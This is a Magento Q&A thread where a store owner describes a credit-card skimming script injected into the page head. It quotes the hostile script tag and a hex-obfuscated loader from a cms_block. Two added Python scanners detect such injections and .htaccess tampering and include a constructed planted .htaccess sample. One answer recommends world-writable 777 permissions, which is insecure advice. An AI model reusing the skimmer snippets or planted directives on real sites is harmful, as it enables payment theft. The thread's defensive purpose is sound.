
Magento 2 hacked with script in head

Magento Asked by Casey on October 25, 2020

I can’t seem to locate how this script is getting into the head section of my site but it’s stealing credit cards. I’ve grepped the entire codebase and searched the entire database for “seooptimization” and found nothing so it must be added via createElement somewhere? What’s interesting is it’s added in the middle of all my theme js files. Can anyone help me track this down and figure out how to avoid it getting into the head of my site because I’ve chased it around for months now. I’ve removed it from the cms_block in the database, from miscellaneous scripts in the admin and they just keep finding new ways to put it on the site, now I can’t even track it down to get it off. Here’s what it looks like.

<script src="https://mage-seooptimization.com/events" id="magento-init"></script>

EDIT: So I finally was able to remove this. I found it in the database in one of my footer blocks in the cms_block table. It was disguised as follows:

<script>var meta_tags = ["0604104A124B2257060A0F021D1605114537","4B030D1849001802451A57514D014C164C0604181E040D59124A5D50", "19034A475057444D120B0405190E5E090D090002101F0B4C1A", "11110A04001B1C5E0C0C0E040E36164D1131192B50591E140B", "0245065705191A05080704154D0F1117420B5C12571317070B15", "15200E0F0C1317044D4519020410001145435A1757030016", "3111161808140C04004A4D12041A5749", "570D161E1105435F4A0F0B06135403000D051102101D0C180B151F161E4B01050C591C06000C1E1251504B", "114B110F15370D04170B0814021C58420B0E465A5E1D04050F0F0216", "5D0C0C031551504B014C0204171D5E04121A04181D33", "180C0E0E4917504B07100F001D044B"];</script>

Maybe someone can comment on how that could possibly end up being a script in the head section of the site?

Also, this doesn’t solve how it got there in the first place. Are there any known methods to inject code into the database for Magento 2.2.6 that may need patching? As far as I know I have all available patches applied.

List of enabled modules:

Aitoc_DimensionalShipping | EkoUK_ImageCleaner | Experius_WysiwygDownloads | FishPig_WordPress | FishPig_WordPress_RelatedProducts | MagePal_GuestToCustomer | MagePsycho_Customshipping | Amasty_Base | Amazon_Core | Amazon_Login | Amazon_Payment | FME_Faqs | Bold_OrderComment | Klarna_Core | Klarna_Ordermanagement | Magefan_LoginAsCustomer | Amasty_CronScheduleList | FME_Prodfaqs | Amasty_GiftCard | Klarna_Kp | Ebizmarts_MailChimp | Dotdigitalgroup_Email | Mageplaza_Core | Mageplaza_Smtp | Magiccart_Alothemes | Magiccart_Magicmenu | Magiccart_Magicproduct | Magiccart_Magicslider | Magiccart_Shopbrand | Magiccart_Testimonial | Mirasvit_Core | Mirasvit_Misspell | Mirasvit_Report | Mirasvit_Search | Mirasvit_SearchAutocomplete | Mirasvit_SearchLanding | Mirasvit_SearchMysql | Mirasvit_SearchReport | Mirasvit_SearchSphinx | Mirasvit_SearchUltimate | ShipWorks_Module | Temando_Shipping | VNS_Custom | Vertex_Tax | WeltPixel_Backend | WeltPixel_Maxmind |
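One way to hunt for the injected markup in the places the question mentions (cms_block content and the admin's "Miscellaneous Scripts" fields, which Magento stores in core_config_data under paths such as design/head/includes), as an added example that is not part of the original question or of Magento itself: it flags external script hosts that are not on an allow-list, plain inline scripts, and the array-of-long-hex-literals shape quoted above. The rows are constructed samples that reuse the snippet and the domain from the question; on a real install you would feed it the output of `SELECT identifier, content FROM cms_block` (likewise cms_page) and `SELECT path, value FROM core_config_data WHERE path LIKE 'design/%'`.

```python
import re
from typing import FrozenSet, Iterable, List, Tuple

Finding = Tuple[str, str, str]  # (where it was found, rule name, evidence)

# Constructed sample rows in the shape of Magento's cms_block (identifier, content)
# and core_config_data (path, value) tables. The second and third rows reuse the
# disguised array and the script tag quoted in the question; design/head/includes
# is where the admin's head "Scripts and Style Sheets" field is stored.
SAMPLE_ROWS: List[Tuple[str, str]] = [
    ("cms_block:footer_links",
     '<ul><li><a href="/contact">Contact</a></li></ul>'),
    ("cms_block:footer_payment",
     '<p>We accept all major cards.</p>'
     '<script>var meta_tags = ["0604104A124B2257060A0F021D1605114537",'
     '"4B030D1849001802451A57514D014C164C0604181E040D59124A5D50",'
     '"19034A475057444D120B0405190E5E090D090002101F0B4C1A"];</script>'),
    ("core_config_data:design/head/includes",
     '<script src="https://mage-seooptimization.com/events" id="magento-init"></script>'),
    ("cms_block:legit_widget",
     '<script type="text/x-magento-init">{"*": {"Magento_Ui/js/core/app": {}}}</script>'),
]

# <script src="//host/..."> with an absolute URL: capture the host for allow-list checks.
EXTERNAL_SRC = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?(?:https?:)?//([^/"\'\s>]+)', re.I)
# Inline <script> bodies, i.e. script tags without a src attribute.
INLINE_SCRIPT = re.compile(
    r'<script(?![^>]*\bsrc\s*=)[^>]*>(.*?)</script>', re.I | re.S)
# A JS array of three or more long hex literals: the disguise shape shown in the question.
HEX_ARRAY = re.compile(
    r'\[\s*(?:"[0-9A-Fa-f]{16,}"\s*,\s*){2,}"[0-9A-Fa-f]{16,}"\s*\]')


def scan_content(where: str, html: str,
                 allowed_hosts: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Report suspicious script usage in one stored HTML fragment."""
    findings: List[Finding] = []
    for m in EXTERNAL_SRC.finditer(html):
        host = m.group(1).lower()
        if host not in allowed_hosts:
            findings.append((where, "external_script", host))
    for m in INLINE_SCRIPT.finditer(html):
        body = m.group(1).strip()
        rule = "hex_string_array" if HEX_ARRAY.search(body) else "inline_script"
        findings.append((where, rule, body[:60]))
    return findings


def scan_rows(rows: Iterable[Tuple[str, str]],
              allowed_hosts: FrozenSet[str] = frozenset()) -> List[Finding]:
    """Scan every (label, html) row and concatenate the findings in row order."""
    findings: List[Finding] = []
    for where, html in rows:
        findings.extend(scan_content(where, html, allowed_hosts))
    return findings


if __name__ == "__main__":
    for where, rule, evidence in scan_rows(SAMPLE_ROWS):
        print(f"{rule:17} {where:40} {evidence}")
```

Inline scripts are reported as well because a legitimate block can contain `text/x-magento-init` JSON, so the `inline_script` rule is a review list rather than a verdict; the hex-array rule is the one that would have pointed straight at the footer block the question eventually found. Running the scan on a schedule and diffing its output against the previous run is also how a re-injection of the kind the question describes shows up the same day instead of months later.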

4 Answers

I have encountered the same issue. It was injecting a fake payment section in the checkout page. This time the link was different though. I was able to remove the code using the header block editor in the admin. But I'm kind of sure it will happen again. Anyway, I'm going to update the whole thing and put a paid firewall service in front of it. If anybody finds a solution to this, it'd be very helpful. Thanks.

Answered by Mathew on October 25, 2020

Facing the same thing, and I have about 70% of the same modules as you!!! Did you ever find out which module led to the vulnerability?

Answered by Jojo on October 25, 2020

  1. Check your site in a clean browser (not the one you usually use) in case a browser extension adds the script to the page.
  2. Modify the root index.php to "echo 123" to check whether the injected script is related to Magento at all.
  3. Check on the Luma or Base theme to know whether to blame your custom theme.
  4. If the theme is not the cause, disable all 3rd-party modules and check:

php bin/magento module:status | grep -v Magento | grep -v List | grep -v None | grep -v -e '^$' | xargs php bin/magento module:disable

  5. Go over all .htaccess files in the project and look for suspicious file injection.
  6. If neither the theme nor 3rd-party modules are the cause, the issue is probably hidden somewhere in the Magento core files.

Answered by Denys Belevtsov on October 25, 2020
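Step 5 above (read every .htaccess) is tedious by hand on a Magento tree that ships dozens of them, so here is an added example, not from the answer and not part of Magento, that walks the tree and reports the directives that matter most when a site keeps getting re-infected: PHP auto_prepend_file/auto_append_file (also honoured from .user.ini), handler lines that make non-PHP extensions execute as PHP, and RewriteRules that send visitors to another host. The two files it scans are constructed samples written into a temporary directory; the /PLACEHOLDER path and the example.invalid host are made up, not indicators from any real incident. On a real install, point audit_htaccess at the Magento root.

```python
import os
import re
import tempfile
from typing import List, Tuple

Finding = Tuple[str, str, str]  # (path relative to the root, rule name, offending line)

# Directives worth a manual look in any .htaccess or .user.ini: they make every PHP
# request load an extra file, make non-PHP extensions execute as PHP, or redirect to
# another host. Each stripped, non-comment line is tested against every pattern.
SUSPICIOUS = [
    ("code_injection", re.compile(r'auto_(?:prepend|append)_file', re.I)),
    ("handler_mapping", re.compile(r'^(?:AddHandler|SetHandler|AddType)\b.*php', re.I)),
    ("external_rewrite", re.compile(r'^RewriteRule\b.*https?://', re.I)),
]

# Constructed sample modelled on a stock Magento root .htaccess: must produce no findings.
CLEAN_HTACCESS = """\
<IfModule mod_php7.c>
    php_value memory_limit 756M
    php_flag session.auto_start off
</IfModule>
<IfModule mod_rewrite.c>
    RewriteEngine on
    RewriteRule .* index.php [L]
</IfModule>
"""

# Constructed sample of a tampered file; the path and host are placeholders, not real indicators.
PLANTED_HTACCESS = """\
Options -Indexes
php_value auto_prepend_file /PLACEHOLDER/path/loader.php
AddHandler application/x-httpd-php .jpg
RewriteRule ^(.*)$ https://example.invalid/$1 [R=302,L]
"""


def audit_htaccess(root: str) -> List[Finding]:
    """Walk the tree under root and report suspicious lines in every .htaccess/.user.ini."""
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() not in (".htaccess", ".user.ini"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                for raw in fh:
                    line = raw.strip()
                    if not line or line.startswith("#"):
                        continue
                    for rule, pattern in SUSPICIOUS:
                        if pattern.search(line):
                            findings.append((rel, rule, line))
    return sorted(findings)


def build_sample_tree() -> str:
    """Write the two constructed .htaccess files into a fresh temporary 'Magento root'."""
    root = tempfile.mkdtemp(prefix="magento-htaccess-audit-")
    os.makedirs(os.path.join(root, "pub", "media"))
    with open(os.path.join(root, ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write(CLEAN_HTACCESS)
    with open(os.path.join(root, "pub", "media", ".htaccess"), "w", encoding="utf-8") as fh:
        fh.write(PLANTED_HTACCESS)
    return root


if __name__ == "__main__":
    for rel, rule, line in audit_htaccess(build_sample_tree()):
        print(f"{rule:17} {rel:25} {line}")
```

The stock root file's own `php_value` and `RewriteRule` lines pass untouched, which is the point of matching specific directives rather than anything that looks like configuration; a hit under pub/media or var is the one to look at first, since nothing Magento writes there should execute PHP at all.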

  1. First of all, scan your website with the available tools, like:

    • SiteCheck
    • MageReport
    • UnmaskParasites
    • Foregenix
    • Github Magento Malware Scanner
    • MageScan
    • VirusTotal

then you will get some idea of the malware and security issues on your website.

  2. Please ask your hosting provider for a detailed report on website security.

  3. You can check Magento file and folder permissions from your end as well and set them properly by running the following commands:

find . -type f -exec chmod 644 {} \;             # 644 permission for files
find . -type d -exec chmod 755 {} \;             # 755 permission for directories
find ./var -type d -exec chmod 777 {} \;         # 777 permission for the var folder
find ./pub/media -type d -exec chmod 777 {} \;   # 777 permission for pub/media
find ./pub/static -type d -exec chmod 777 {} \;  # 777 permission for pub/static
chmod 777 ./app/etc                              # 777 permission for app/etc
chmod 644 ./app/etc/*.xml                        # 644 permission for the config xml files

Hope this will help you. Please share an update after this activity so I can guide you on the next step.

Answered by Jack on October 25, 2020
